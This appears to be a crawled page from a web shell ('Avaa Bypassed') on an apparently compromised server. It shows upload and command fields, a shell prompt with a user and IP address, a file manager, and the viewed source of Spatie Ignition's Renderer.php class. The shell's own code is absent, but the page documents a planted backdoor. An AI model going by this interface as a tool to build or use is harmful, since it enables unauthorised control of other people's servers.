404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@18.116.49.38: ~ $
<?php

namespace Spatie\Ignition\ErrorPage;

class Renderer
{
    /**
     * @param array<string, mixed> $data
     *
     * @return void
     */
    public function render(array $data): void
    {
        $viewFile = __DIR__ . '/../../resources/views/errorPage.php';

        extract($data, EXTR_OVERWRITE);

        include $viewFile;
    }
}

Filemanager

Name Type Size Permission Actions
ErrorPageViewModel.php File 3.5 KB 0644
Renderer.php File 365 B 0644